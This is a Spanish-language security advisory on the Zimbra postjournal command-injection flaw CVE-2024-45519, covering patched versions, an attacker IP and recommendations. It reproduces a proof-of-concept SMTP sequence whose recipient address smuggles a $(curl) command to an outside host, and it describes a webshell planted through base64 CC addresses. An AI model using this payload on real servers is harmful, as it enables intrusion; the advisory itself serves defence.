Conclusiones clave Una vulnerabilidad crítica de ejecución remota de código (RCE) (CVE-2024-45519) en el servicio de publicación de revistas de Zimbra está bajo ataque activo; Se insta a los usuarios a parchear inmediatamente. Una prueba de concepto (PoC) demostró que la vulnerabilidad se puede explotar con correos electrónicos especialmente diseñados. El servicio de análisis SMTP posterior al diario no está habilitado de forma predeterminada en Zimbra, pero como los sensores Cyble detectan más de 90.000 instancias de Zimbra orientadas a la web con vulnerabilidades anteriores sin parches, todos los clientes de Zimbra deben abordar este problema con urgencia. Descripción general Una vulnerabilidad crítica (CVE-2024-45519) en el servicio de publicación de diarios de Zimbra que permite la ejecución remota de comandos no autenticados está bajo ataque activo. La vulnerabilidad permite que la entrada del usuario no desinfectada se pase a popen, lo que permite a los atacantes inyectar comandos arbitrarios. Las versiones parcheadas agregan desinfección de entradas y reemplazan popen con execvp para mitigar la vulnerabilidad de inyección directa de comandos. Los administradores de Zimbra también deben verificar la configuración del parámetro mynetworks para evitar la explotación externa. Las versiones parcheadas incluyen estas versiones y más recientes: 9.0.0 Parche 41 10.0.9 10.1.1 8.8.15 Parche 46 Una IP que se ha identificado como fuente de correos electrónicos maliciosos e intentos de explotación es 79.124.49[.]86. Análisis técnico La explotación comenzó después de que los investigadores de ProjectDiscovery informaran una prueba de concepto (PoC) para la vulnerabilidad. Los investigadores invirtieron el binario posterior al diario y descubrieron que no había llamadas a execvp ni a la función run_command. En cambio, se realizó una llamada directa a popen en la función read_maps, lo que permitió pasar la entrada sin desinfección. El argumento cmd pasado a popen entre comillas dobles evitaría la inyección de comandos con metacaracteres de shell simples, pero ese control podría omitirse con la sintaxis $(). Luego se aprovechó el servicio postdiario a través del puerto 10027 con los siguientes comandos SMTP: EHLO localhost MAIL FROM:

RCPT A: <“aabbb$(curl${IFS}oast.me)”@mail.domain.com>

Mensaje de prueba de DATOS. El mismo exploit en el puerto SMTP 25 requirió que se habilitara el servicio postdiario, lo cual se logró con un script Bash: zmlocalconfig -e postjournal_enabled=true zmcontrol restart Para habilitar el exploit remoto, los investigadores encontraron que la configuración predeterminada de mynetworks incluía un rango CIDR /20 de su dirección IP pública, lo que podría permitir que el exploit se realice de forma remota si el servicio postdiario está habilitado y el atacante se encuentra dentro del rango de red permitido. Los investigadores de Proofpoint han observado la vulnerabilidad bajo explotación, con correos electrónicos falsos enviados a direcciones falsas en campos CC para intentar que los servidores Zimbra los analicen y ejecuten como comandos. Las direcciones contenían cadenas base64 que se ejecutan con la utilidad sh. Algunos de los correos electrónicos utilizaron direcciones CC en un intento de crear un webshell en un servidor Zimbra vulnerable. La lista CC completa se envuelve como una cadena y, si están conectados, los blobs base64 se decodifican en un comando para escribir un webshell en /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp (ver imagen a continuación). Una vez instalado, el webshell escucha las conexiones entrantes y también admite la ejecución de comandos a través de exec o descarga y ejecución a través de una conexión de socket. Zimbra es un objetivo popular de los actores de amenazas cibernéticas, y CISA ya incluye varias vulnerabilidades críticas en Zimbra Product Suite en su catálogo de vulnerabilidades explotadas conocidas: cveIDvendorProjectproductvulnerabilityNameCVE-2023-37580ZimbraCollaboration (ZCS)Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) VulnerabilityCVE -2022-27926ZimbraCollaboration (ZCS)Zimbra Collaboration (ZCS) Vulnerabilidad de secuencias de comandos entre sitios (XSS)CVE-2022-41352ZimbraCollaboration (ZCS)Zimbra Collaboration (ZCS)Vulnerabilidad de carga de archivos arbitrariosCVE-2022-27925ZimbraCollaboration (ZCS)Zimbra Collaboration (ZCS) Archivo arbitrario Vulnerabilidad de cargaCVE-2022-37042ZimbraCollaboration (ZCS)Vulnerabilidad de omisión de autenticación de Zimbra Collaboration (ZCS)CVE-2022-27924ZimbraCollaboration (ZCS)Vulnerabilidad de inyección de comandos de Zimbra Collaboration (ZCS)CVE-2018-6882ZimbraCollaboration Suite (ZCS)Zimbra Collaboration Suite (ZCS) secuencias de comandos del sitio (XSS) VulnerabilidadCVE-2022-24682ZimbraWebmailVulnerabilidad de secuencias de comandos entre sitios de Zimbra Webmail Si bien CVE-2024-45519 aún no se ha informado oficialmente, los datos de Cyble ya muestran más de 50.000 servidores Zimbra expuestos a la web con vulnerabilidades críticas anteriores sin parches. Queda por ver cuántos estarán expuestos a la última vulnerabilidad. Recomendaciones Todos los administradores de Zimbra deben: Deshabilitar el postdiario si no es necesario Configurar mynetworks para evitar el acceso no autorizado Aplicar las últimas actualizaciones de seguridad directamente desde Zimbra